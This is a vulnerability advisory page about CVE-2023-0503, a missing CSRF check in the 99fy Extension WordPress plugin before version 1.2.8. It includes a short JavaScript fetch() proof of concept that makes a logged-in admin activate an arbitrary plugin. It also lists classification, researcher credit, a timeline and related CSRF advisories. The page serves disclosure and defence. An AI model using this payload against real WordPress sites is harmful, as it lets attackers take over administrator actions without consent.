Free WooCommerce Theme 99fy Extension < 1.2.8 – Arbitrary Plugin Activation via CSRF | CVE 2023-0503 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack

Proof of Concept

activate woocommerce plugin exploit:

fetch('http://localhost/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=99fy_ajax_plugin_activation&location=woocommerce/woocommerce.php',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

Fixed in 1.2.8

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

3cb148fb-1f30-4316-a421-10da51d849f3

Timeline

Publicly Published

2023-02-28 (about 2 years ago)

Added

2023-02-28 (about 2 years ago)

Last Updated

2023-03-07 (about 2 years ago)

Other

Published

Title

Published

2025-01-07

Title

Instabot <= 1.10 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-04-01

Title

CLP – Custom Login Page by NiteoThemes <= 1.5.5 - Cross-Site Request Forgery

Published

2025-05-16

Title

SEO Flow by LupsOnline <= 2.2.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-02-27

Title

Maspik – Spam blacklist < 0.7.9 - Cross-Site Request Forgery (CSRF)

Published

2014-07-26

Title

Brute Force Login Protection <= 1.5.3 - Arbitrary IP Removal/Add via CSRF